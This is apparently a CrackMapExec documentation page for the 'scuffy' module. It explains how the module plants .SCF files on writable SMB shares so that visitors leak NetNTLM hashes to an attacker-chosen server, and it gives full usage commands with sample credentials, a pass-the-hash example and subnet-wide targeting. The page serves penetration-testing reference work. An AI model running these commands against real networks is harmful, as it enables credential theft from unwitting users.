CrackMapExec Scuffy (smb)

This page contains detailed information about how to use the scuffy CME module while using the smb protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.

Description

---

This module creates a .SCF file on all remote writeable shares. The .SCF file contains an icon property with a UNC path pointing to an arbitrary SERVER location (ideally the attacker's machine). Afterwards, anyone who visits the shared folder (with the .SCF file inside) will automatically try to authenticate against the specified SERVER and send NetNTLM hash. The attacker can then capture the NetNTLM hash (e.g. by using Responder or the auxiliary/server/capture/smb Metasploit module) and crack it.

The scuffy module is OPSEC unsafe which means that it may touch the disk and therefore can trigger an alarm.

Supported Protocols

---

• smb

Module Source Code

---

• https://github.com/byt3bl33d3r/CrackMapExec/tree/master/cme/modules/scuffy.py

Authors

---

• @kierangroome

Module Options

---

Here is a complete list of scuffy module options:

# cme smb -M scuffy --options
[*] scuffy module options:

        SERVER      IP of the SMB server
        NAME        SCF file name
        CLEANUP     Cleanup (choices: True or False)

The SERVER and NAME options are required! Make sure to set them when using this module.

Module Usage

---

This is how to use the scuffy module while using the smb protocol:

Syntax:
# cme smb <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M scuffy -o SERVER=<host> -o NAME=<name>

Local admin:
# cme smb 10.0.5.1 -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M scuffy -o SERVER=10.0.6.11 -o NAME=test

Domain user:
# cme smb 10.0.5.1 -u bkpadmin -p P@ss123 -d target.corp -M scuffy -o SERVER=10.0.6.11 -o NAME=test

CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:

# cme smb 10.0.5.1 -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M scuffy -o SERVER=10.0.6.11 -o NAME=test

The scuffy module can be also used against multiple hosts. Here's how to run it against multiple hosts:

# cme smb target_list.txt -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.0/24 -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1-100 -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test

References

---

• https://room362.com/post/2016/smb-http-auth-capture-via-scf/
• https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/server/capture/smb

Version

---

This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.